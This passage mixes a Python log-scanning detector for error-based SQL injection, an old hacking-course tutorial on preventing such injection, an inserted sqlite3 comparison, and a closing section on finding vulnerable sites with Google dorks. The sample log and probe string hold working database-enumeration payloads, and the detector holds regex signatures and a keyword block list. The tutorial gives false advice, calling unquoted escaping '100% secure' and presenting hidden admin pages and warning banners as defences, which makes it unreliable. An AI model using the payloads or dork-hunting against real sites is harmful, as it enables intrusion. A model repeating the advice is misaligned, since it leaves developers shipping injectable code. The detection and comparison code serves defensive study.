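SAMPLE_LOG = """\
2009-05-26 14:24:20 10.0.0.5 GET /page.asp id=1 200
2009-05-26 14:24:21 10.0.0.5 GET /page.asp id=1+and+1=convert(int,@@version) 500
2009-05-26 14:24:22 10.0.0.5 GET /page.asp id=1+and+1=convert(int,db_name())-- 500
2009-05-26 14:24:23 10.0.0.5 GET /page.asp id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))-- 500
2009-05-26 14:24:30 10.0.0.9 GET /index.asp sid=42 200
2009-05-26 14:24:31 10.0.0.9 GET /page.asp id=123 200
"""

# Signatures of the error-based enumeration technique (steps 2-5 above).
# Each entry is (name, compiled regex); matching runs on the URL-decoded query.
SIGNATURES = [
    ("convert_int", re.compile(r"\bconvert\s*\(\s*int\s*,", re.I)),
    ("server_info_fn", re.compile(r"@@version|\bdb_name\s*\(|\buser_name\s*\(", re.I)),
    ("schema_enum", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("select_top_1", re.compile(r"\bselect\s+top\s+1\b", re.I)),
]


def parse_line(line):
    """Split one constructed log line into its fields and URL-decode the query."""
    date, time, ip, method, path, query, status = line.split()
    return {
        "time": f"{date} {time}",
        "ip": ip,
        "path": path,
        "query": unquote_plus(query),   # '+' becomes ' ', %xx sequences are decoded
        "status": int(status),
    }


def flag_probes(log_text):
    """Return one record per request whose query matches at least one signature."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        matched = [name for name, rx in SIGNATURES if rx.search(rec["query"])]
        if matched:
            hits.append({**rec, "signatures": matched})
    return hits


def summarize_by_ip(hits):
    """Per source IP: (probe requests seen, how many drew a 5xx, i.e. an error page)."""
    summary = {}
    for h in hits:
        probes, errors = summary.get(h["ip"], (0, 0))
        summary[h["ip"]] = (probes + 1, errors + (1 if h["status"] >= 500 else 0))
    return summary


if __name__ == "__main__":
    found = flag_probes(SAMPLE_LOG)
    for h in found:
        print(h["time"], h["ip"], h["path"], h["status"], ",".join(h["signatures"]))
    print(summarize_by_ip(found))
```

A run of several flagged requests from one IP in quick succession, each answered with a 500, is the enumeration walk-through above as seen from the server; the same scan also shows where the application returns raw database errors to the client, which is the leak to fix (return a generic error page and log the details server-side).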

We have learned how to hack a webserver by SQL injection; now we will learn how to protect webservers from SQL attacks.
________________________________________________________________
Preventing webservers from SQL attacks
________________________________________________________________

SQL injection is still used by script kiddies, grey hats and even black hat hackers; it is the easiest way to hack into someone's website. So in this article I will give you some tips on how to prevent SQL injection on your own or your company's website.

1. Don't allow special characters
As we all know, SQL injection strings often contain
special symbols, typically a combination of OR and =. So try to use stored procedures instead of SELECT * FROM table_name WHERE Username="..." AND Password="...". This is the common code and it is vulnerable. So validate your input and avoid accepting special symbols.

2. Use email instead of user ID
The best way to prevent SQL injection is to use an email address as the username. The code is then written to validate the field so that it accepts nothing but an email address. SQL injection strings are thus not accepted, and SQL injection is prevented.


3. Try to hide your admin login page
Well, there is no security in this universe, there is only opportunity, and if you show your admin login page link on your website you are giving the hacker that opportunity. It is an obvious thing that SQL injection can only be done through your admin login panel (sometimes through the URL) and the user login panel. So don't show your admin login link directly on your website.

4. Don't use the default admin login page
Another way to protect your website from SQL injection is to name your admin login page as you like. Use login page links like "powerlogin.asp" or "herologin.asp", something different that cannot be found easily with Google hacks. So when a hacker tries to search for your admin login page, he or she will search for adminlogin.asp, admin/login.asp or something like that, get frustrated, and leave your website.

5. Social engineering
Don't disclose your website's vulnerabilities to anyone. Try to get help from GOD itself, and by GOD here I mean Google: instead of discussing your website's vulnerabilities with a single person, search for the solutions on Google. And last but not least, have a WARNING message on your login pages, something scary like "We are using a transparent proxy, do not try to hack, otherwise legal action will be taken." That really works: at least before trying to hack into your website, he will think twice. So I hope this unique article will help website developers prevent SQL injection attacks. This is the first ever article by anyone with these techniques.

There are a number of other things you can do. I will show you a few more here for PHP developers.

Alternative one
Let's say this is your code:
Code:
---------------------------------------------------------------------------------------------
<?php

// Vulnerable: $_GET['id'] is concatenated straight into the SQL string.
$result = mysql_query('SELECT text FROM pages WHERE id=' . $_GET['id']);
$row = mysql_fetch_assoc($result);
echo($row['text']);

?>
----------------------------------------------------------------------------------------------

This means that you are selecting the page content, which is 'text', from 'pages' in the SQL database, and you are picking the right page content with $_GET['id'], which is the value in the URL. Example: http://www.freeceh.in/index.php?id=123

This code is easily injectable. But if you do this:
Code:
--------------------------------------------------------------------------------------------
<?php

// Quote characters in $_GET['id'] are escaped before it reaches the SQL string.
$result = mysql_query('SELECT text FROM pages WHERE id=' . mysql_real_escape_string($_GET['id']));
$row = mysql_fetch_assoc($result);
echo($row['text']);

?>
-------------------------------------------------------------------------------------------
You are 100% secure

Alternative two
This one is not as good as the first one, but it still works.

Again, say this is your PHP code:
Code:
---------------------------------------------------------------------------------------------
<?php

// Vulnerable: $_GET['id'] is concatenated straight into the SQL string.
$result = mysql_query('SELECT text FROM pages WHERE id=' . $_GET['id']);
$row = mysql_fetch_assoc($result);
echo($row['text']);

?>

--------------------------------------------------------------------------------------------
Again, this is very simple to inject. But you can check $_GET['id'] for "illegal" strings, like this:
Code:
-----------------------------------------------------------------------------------------------------------
<?php

// Drop the request if the id parameter contains any of these keywords
// (case-insensitive).
$id = strtolower($_GET['id']);
foreach (array('union', 'select', 'information_') as $bad) {
    if (strpos($id, $bad) !== false) {
        die();
    }
}

$result = mysql_query('SELECT text FROM pages WHERE id=' . $_GET['id']);
$row = mysql_fetch_assoc($result);
echo($row['text']);

?>
--------------------------------------------------------------------------------------------
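Both alternatives above still build the SQL text by concatenation. The following added example (not code from the original page; it uses Python's built-in sqlite3 as a stand-in for the PHP/MySQL snippets, and the constructed PROBE string is the tutorial's own step 2 request, URL-decoded) puts the concatenated query, the keyword filter of alternative two, a bound parameter and an integer check side by side. One caveat worth knowing: the tutorial's first probes contain no quote character and none of the three blacklisted keywords, so an escaping function only changes quotes and the keyword filter lets them through unchanged, while binding the value or refusing anything that is not an integer stops them regardless of their content.

```python
import sqlite3

# Constructed sample probe: the tutorial's step 2 request, URL-decoded.
PROBE = "1 and 1=convert(int,db_name())"

# The keywords checked by the page's "Alternative two" filter.
BLOCKED_KEYWORDS = ("union", "select", "information_")


def make_db():
    """In-memory stand-in for the 'pages' table, filled with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER, text TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)",
                     [(1, "home"), (2, "about"), (123, "contact")])
    return conn


def keyword_filter_blocks(page_id):
    """Port of Alternative two: True if the request would be dropped."""
    lowered = page_id.lower()
    return any(bad in lowered for bad in BLOCKED_KEYWORDS)


def lookup_concat(conn, page_id):
    """Vulnerable form: the parameter is concatenated into the SQL text."""
    try:
        rows = conn.execute("SELECT text FROM pages WHERE id=" + page_id).fetchall()
    except sqlite3.Error as exc:
        # The database's own error text reaches the caller; returning it to the
        # browser is exactly the leak the error-based technique above reads from.
        return ("error", str(exc))
    return ("ok", rows)


def lookup_param(conn, page_id):
    """Hardened form: a bound parameter is data and is never parsed as SQL."""
    rows = conn.execute("SELECT text FROM pages WHERE id=?", (page_id,)).fetchall()
    return ("ok", rows)


def lookup_validated(conn, page_id):
    """Hardened form with input validation: reject anything that is not an integer
    before any query is issued, then bind the integer."""
    if not page_id.isdigit():
        return ("rejected", [])
    return lookup_param(conn, int(page_id))


if __name__ == "__main__":
    db = make_db()
    print("filter blocks probe? ", keyword_filter_blocks(PROBE))
    print("concatenated query:  ", lookup_concat(db, PROBE))
    print("bound parameter:     ", lookup_param(db, PROBE))
    print("validated integer:   ", lookup_validated(db, PROBE))
```

With the concatenated query the probe is parsed as SQL and the engine's error text comes back to the caller; with a bound parameter the same string is compared as a value, matches no row, and no error is produced, so there is nothing for the convert() trick to read.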

________________________________________________________________
How to find SQL vulnerable websites
________________________________________________________________

We use Google hacking to find vulnerable websites. Google Hacking is another module of C|EH which I will discuss after this module.

Now we will use some dorks to find SQL vulnerable websites. Just copy one dork into the Google search engine and see the result: a lot of websites with id=? come up. Around 50% of them are SQLi vulnerable.
Click here for the SQLi dorks!
